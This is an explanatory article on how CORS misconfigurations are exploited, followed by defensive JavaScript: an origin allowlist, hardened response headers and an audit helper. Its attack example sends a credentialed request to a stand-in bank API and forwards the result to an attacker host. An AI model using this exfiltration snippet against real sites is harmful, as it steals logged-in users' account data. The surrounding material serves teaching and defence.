Real-World CORS Attack Scenarios
Understanding how CORS can be exploited is essential for anyone responsible for web security. Attackers often look for sites with CORS misconfigurations, which can create dangerous attack vectors. These vulnerabilities allow malicious sites to interact with protected resources, bypassing the same-origin policy that browsers enforce by default. When a server trusts the wrong origins or uses overly permissive settings, attackers can leverage these weaknesses to perform actions or access data as if they were legitimate users.
Consider a scenario where a popular banking website incorrectly configures its CORS policy by allowing all origins using the wildcard "*" or by reflecting the Origin header in its response. An attacker creates a malicious website designed to lure users who are currently logged in to the bank. When a victim visits the attacker's site, hidden JavaScript code sends a cross-origin request to the bank's API endpoint that returns sensitive account information. Because of the misconfigured CORS headers, the browser allows the attacker's JavaScript to read the response, exposing confidential user data such as account balances or transaction history. This type of vulnerability can have severe consequences, including identity theft or financial loss.
    // Malicious site JavaScript exploiting vulnerable CORS configuration
    fetch("https://vulnerable-bank.com/api/account", {
      credentials: "include"
    })
      .then(response => response.json())
      .then(data => {
        // Attacker steals sensitive account data
        fetch("https://attacker.com/steal", {
          method: "POST",
          body: JSON.stringify(data),
          headers: { "Content-Type": "application/json" }
        });
      });
In the attack example above, the attacker’s site sends a fetch request to the bank’s API while the victim is logged in. The credentials: "include" option ensures that the victim’s authentication cookies are sent with the request. If the bank’s server responds with CORS headers that allow the attacker's origin or use a wildcard, the browser grants the JavaScript access to the sensitive data in the response. One caveat when assessing such a finding: browsers refuse to expose a credentialed response when Access-Control-Allow-Origin is the bare wildcard "*", so the combination that actually leaks authenticated data is a server that reflects the request's Origin header and also sends Access-Control-Allow-Credentials: true. The attacker’s script then forwards this data to their own server. The exploited weakness here is the server’s failure to restrict allowed origins, enabling unauthorized cross-origin access to private information.
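The defensive counterpart, added here as an example and not code from the original article: the origin-reflecting header pattern that causes the leak, the strict allowlist that replaces it, and a small checker that reports what a given origin could read from a server's response headers. All origins are constructed placeholders.

```javascript
// Constructed sample allowlist: only exact, pre-registered origins are trusted.
const ALLOWED_ORIGINS = new Set([
  "https://www.example-bank.test",
  "https://app.example-bank.test",
]);

// VULNERABLE pattern: echoes whatever Origin the browser sent and marks the
// response credentialed, so any site can read authenticated responses.
function reflectingHeaders(requestOrigin) {
  return {
    "Access-Control-Allow-Origin": requestOrigin,
    "Access-Control-Allow-Credentials": "true",
  };
}

// HARDENED pattern: exact string match against the allowlist (no substring or
// regex checks, so "https://app.example-bank.test.attacker.example" fails),
// plus Vary: Origin so a shared cache never serves one origin's headers to
// another. Unknown origins get no CORS headers at all.
function corsHeadersFor(requestOrigin) {
  if (typeof requestOrigin !== "string" || !ALLOWED_ORIGINS.has(requestOrigin)) {
    return {};
  }
  return {
    "Access-Control-Allow-Origin": requestOrigin,
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin",
  };
}

// Audit helper: given the Origin a probe request used and the headers the
// server answered with, report what a script on that origin could read.
//   "blocked"           - browser withholds the response body
//   "public-read"       - readable, but only without cookies (wildcard case)
//   "credentialed-read" - readable with the victim's cookies attached
function auditCorsResponse(requestOrigin, responseHeaders) {
  const h = {};
  for (const [k, v] of Object.entries(responseHeaders)) {
    h[k.toLowerCase()] = String(v).trim();
  }
  const acao = h["access-control-allow-origin"];
  const credentialed = h["access-control-allow-credentials"] === "true";
  if (acao === undefined) return "blocked";
  // Browsers never expose a credentialed response under a wildcard, even if
  // Allow-Credentials: true is also present; anonymous reads still succeed.
  if (acao === "*") return "public-read";
  if (acao === requestOrigin) return credentialed ? "credentialed-read" : "public-read";
  return "blocked";
}
```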